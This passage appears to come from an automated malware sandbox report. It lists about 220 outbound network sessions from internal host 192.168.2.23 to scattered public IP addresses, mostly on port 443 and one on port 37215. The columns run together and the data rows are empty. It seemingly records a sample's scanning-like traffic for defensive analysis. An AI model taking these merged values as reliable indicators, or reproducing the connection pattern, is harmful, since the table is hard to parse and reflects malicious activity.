                                          14868192.168.2.2337868147.94.123.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14869192.168.2.2334872174.199.202.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14870192.168.2.2359582128.87.160.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14871192.168.2.234370874.96.27.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14872192.168.2.2333126216.252.240.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14873192.168.2.2342656191.235.105.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14874192.168.2.2342540211.145.6.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14875192.168.2.2334570129.253.130.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14876192.168.2.235563680.170.195.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14877192.168.2.2340684206.73.125.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14878192.168.2.2354656202.75.204.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14879192.168.2.233887825.195.56.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14880192.168.2.2352198154.39.198.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14881192.168.2.2337532199.104.168.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14882192.168.2.2336130139.237.127.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14883192.168.2.235502254.158.192.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14884192.168.2.2360312216.72.11.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14885192.168.2.23589325.6.31.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14886192.168.2.2344862109.195.50.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14887192.168.2.234546232.25.61.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14888192.168.2.2339350124.199.88.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14889192.168.2.2335998192.211.141.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14890192.168.2.2359714191.25.89.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14891192.168.2.2360026168.94.197.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14892192.168.2.2344750169.101.18.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14893192.168.2.2353326120.16.2.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14894192.168.2.235073634.44.229.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14895192.168.2.235977440.0.230.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14896192.168.2.23460485.179.86.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14897192.168.2.235712027.91.82.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14898192.168.2.234504897.182.222.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14899192.168.2.235055251.103.186.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14900192.168.2.235927819.231.213.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14901192.168.2.235697239.177.90.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14902192.168.2.2334782156.97.129.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14903192.168.2.2333740169.137.244.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14904192.168.2.2346056219.50.100.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14905192.168.2.235150092.50.88.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14906192.168.2.2334958123.168.207.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14907192.168.2.235045645.224.65.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14908192.168.2.2346794207.178.215.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14909192.168.2.2351552153.78.214.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14910192.168.2.2342148200.223.87.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14911192.168.2.2333018179.204.46.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14912192.168.2.2358190219.191.223.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14913192.168.2.2355516137.150.221.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14914192.168.2.23492325.162.212.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14915192.168.2.234364663.55.208.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14916192.168.2.2347478128.107.233.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14917192.168.2.2349362145.230.104.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14918192.168.2.234722044.224.27.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14919192.168.2.235589691.140.43.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14920192.168.2.2348212103.122.29.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14921192.168.2.235108687.223.148.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14922192.168.2.2338738159.52.22.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14923192.168.2.233389087.102.116.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14924192.168.2.235512668.47.112.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14925192.168.2.2352162211.113.253.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14926192.168.2.234350654.43.215.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14927192.168.2.2345922179.118.29.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14928192.168.2.2336982108.134.96.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14929192.168.2.2345024153.234.171.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14930192.168.2.2341406116.51.17.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14931192.168.2.234682276.151.117.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14932192.168.2.2351770179.10.223.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14933192.168.2.23363869.214.250.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14934192.168.2.2357424126.8.5.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14935192.168.2.233744862.12.30.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14936192.168.2.236064262.19.247.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14937192.168.2.2332908106.76.86.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14938192.168.2.2338948168.232.32.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14939192.168.2.235802492.119.161.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14940192.168.2.2344190183.10.60.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14941192.168.2.2339816138.39.190.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14942192.168.2.2340290203.244.96.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14943192.168.2.2353184145.210.248.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14944192.168.2.2343206193.39.233.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14945192.168.2.2357606111.237.2.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14946192.168.2.2337110192.21.35.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14947192.168.2.2343766130.199.60.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14948192.168.2.2341842179.161.166.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14949192.168.2.234920642.49.95.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14950192.168.2.2347876118.198.167.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14951192.168.2.234958012.93.211.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14952192.168.2.2356578109.44.229.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14953192.168.2.2356528200.181.215.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14954192.168.2.234547494.115.104.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14955192.168.2.2337056165.0.150.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14956192.168.2.2340176117.28.197.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14957192.168.2.236092238.50.229.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14958192.168.2.236053478.179.63.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14959192.168.2.2338946222.132.212.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14960192.168.2.233500095.149.38.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14961192.168.2.2333636141.182.97.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14962192.168.2.2340220159.167.185.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14963192.168.2.2337976202.15.5.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14964192.168.2.235587848.252.95.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14965192.168.2.235142868.97.37.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14966192.168.2.235205446.240.208.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14967192.168.2.234029698.193.8.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14968192.168.2.234289487.157.122.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14969192.168.2.23444685.223.22.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14970192.168.2.234388446.24.245.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14971192.168.2.2360790151.137.196.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14972192.168.2.233281419.142.197.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14973192.168.2.234592478.57.247.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14974192.168.2.2332844143.216.35.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14975192.168.2.234717624.134.169.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14976192.168.2.235152238.122.15.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14977192.168.2.2348732157.63.153.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14978192.168.2.2336938154.179.201.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14979192.168.2.2353854145.98.43.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14980192.168.2.2336498113.251.217.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14981192.168.2.2349838152.221.57.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14982192.168.2.235442423.137.204.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14983192.168.2.2336188150.82.217.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14984192.168.2.2333504143.172.204.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14985192.168.2.234515268.151.209.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14986192.168.2.235447885.103.79.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14987192.168.2.2346990102.88.87.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14988192.168.2.2336574191.61.215.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14989192.168.2.233465294.201.154.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14990192.168.2.233872281.51.13.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14991192.168.2.2342656159.36.21.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14992192.168.2.236017059.66.21.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14993192.168.2.234210612.130.54.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14994192.168.2.2340570184.172.143.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14995192.168.2.2342628114.2.251.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14996192.168.2.234161692.98.76.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14997192.168.2.2353592219.29.137.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14998192.168.2.2355588216.65.16.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14999192.168.2.2354890104.135.100.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15000192.168.2.2359404207.89.22.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15001192.168.2.234877088.178.189.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15002192.168.2.233988440.241.64.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15003192.168.2.2356450143.163.27.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15004192.168.2.234861023.31.162.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15005192.168.2.2353046158.144.162.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15006192.168.2.2348712193.115.30.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15007192.168.2.2341672190.239.126.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15008192.168.2.234592232.91.56.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15009192.168.2.233954270.178.101.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15010192.168.2.2345798200.94.204.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15011192.168.2.234948834.125.40.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15012192.168.2.2360416213.26.122.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15013192.168.2.2341268209.119.25.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15014192.168.2.2347486185.36.55.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15015192.168.2.2359040129.68.158.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15016192.168.2.2358130110.34.93.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15017192.168.2.236034279.38.65.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15018192.168.2.234425246.38.36.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15019192.168.2.236063267.15.91.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15020192.168.2.234619220.151.83.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15021192.168.2.2351912211.184.207.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15022192.168.2.2336690140.0.2.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15023192.168.2.2359468207.172.92.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15024192.168.2.2334366209.79.247.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15025192.168.2.234016635.206.241.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15026192.168.2.2347928188.173.0.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15027192.168.2.2358408190.86.63.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15028192.168.2.2335148200.145.250.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15029192.168.2.2347438114.148.159.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15030192.168.2.236024672.213.12.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15031192.168.2.234428653.181.94.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15032192.168.2.2346222159.169.212.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15033192.168.2.2347866140.214.90.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15034192.168.2.2333530164.44.226.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15035192.168.2.2334918151.17.91.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15036192.168.2.2335844218.224.159.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15037192.168.2.2345750139.135.56.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15038192.168.2.2360926126.91.115.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15039192.168.2.2360774194.100.248.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15040192.168.2.234110636.222.37.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15041192.168.2.2345572118.219.139.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15042192.168.2.2357438124.126.239.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15043192.168.2.234466639.71.8.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15044192.168.2.2350174196.80.186.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15045192.168.2.233345480.250.3.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15046192.168.2.2333818132.46.20.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15047192.168.2.2358572204.203.128.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15048192.168.2.234013424.13.254.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15049192.168.2.2340558186.37.134.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15050192.168.2.236026032.237.196.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15051192.168.2.2351056206.11.200.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15052192.168.2.2340694206.126.220.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15053192.168.2.233313453.16.250.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15054192.168.2.234330634.30.147.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15055192.168.2.2353542105.122.205.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15056192.168.2.23340608.61.2.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15057192.168.2.2358666109.75.123.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15058192.168.2.2354982192.228.139.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15059192.168.2.235992888.139.172.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15060192.168.2.2356262169.189.157.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15061192.168.2.2337016201.93.178.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15062192.168.2.234860014.51.72.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15063192.168.2.2347642178.197.193.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15064192.168.2.235203668.82.199.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15065192.168.2.2353294174.223.196.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15066192.168.2.2335998221.79.84.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15067192.168.2.2347356222.234.205.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15068192.168.2.236009638.125.51.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15069192.168.2.23423348.235.59.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15070192.168.2.234956442.0.134.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15071192.168.2.233560245.81.122.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15072192.168.2.2339394142.147.107.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15073192.168.2.233524853.66.209.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15074192.168.2.234714492.114.170.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15075192.168.2.234267461.213.108.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15076192.168.2.233752072.232.104.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15077192.168.2.235894058.38.170.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15078192.168.2.23552649.120.46.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15079192.168.2.233292286.10.12.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15080192.168.2.2339224133.32.221.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15081192.168.2.235220441.215.248.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15082192.168.2.23375349.78.66.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15083192.168.2.2359154154.105.248.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15084192.168.2.235595063.78.203.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15085192.168.2.234013842.231.107.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15086192.168.2.234049059.164.228.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15087192.168.2.2340884217.86.122.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15088192.168.2.234273827.214.38.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15089192.168.2.2344952158.240.145.139443
                                          TimestampBytes transferredDirectionData


